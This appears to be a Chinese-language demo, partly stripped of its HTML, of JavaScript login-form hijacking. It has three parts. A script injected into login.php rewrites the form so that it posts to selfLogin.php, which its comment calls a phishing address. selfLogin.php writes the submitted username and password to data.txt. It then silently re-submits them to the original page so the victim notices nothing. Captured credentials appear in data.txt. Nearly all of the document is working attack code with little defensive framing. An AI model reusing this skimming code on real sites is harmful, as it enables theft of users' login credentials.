目錄介紹
login.php 正常登錄的文件
selfLogin.php 自定義的登錄文件
data.txt 記錄用戶輸入的數據
login.php
echo "
";
$userInfo = $_POST ;
if ($userInfo) {
# code...
var_dump($userInfo,'登錄成功') ;exit();
}
?>
登錄用戶姓名:
用戶密碼:
//js劫持代碼
window.onload = function (eve) {
var form = document.getElementById('login');
form.innerHTML = '
用戶姓名: 用戶密碼: ' ;//釣魚地址
form.action = "selfLogin.php" ;
}
selfLogin.php
$name = '' ;
$pwd = '' ;
//var_dump('數據被截取了',$_POST) ;
if($_POST) {
//記錄獲取的數據信息
$name = $_POST['name'] ;
$pwd = $_POST['pwd'] ;
file_put_contents('data.txt', json_encode($_POST,true)) ;
}
?>
//構建之前的頁面
window.onload = function (eve) {
var name = '<?php echo $name; ?>' ;
var pwd = '<?php echo $pwd; ?>' ;
if(name && pwd) {
var div = document.createElement('div');
document.body.appendChild(div);
div.innerHTML ='
'+' 用戶姓名: 用戶密碼: ' ;
document.getElementById('login2').submit();
}
}
data.txt
{"name":"admin","pwd":"123456"}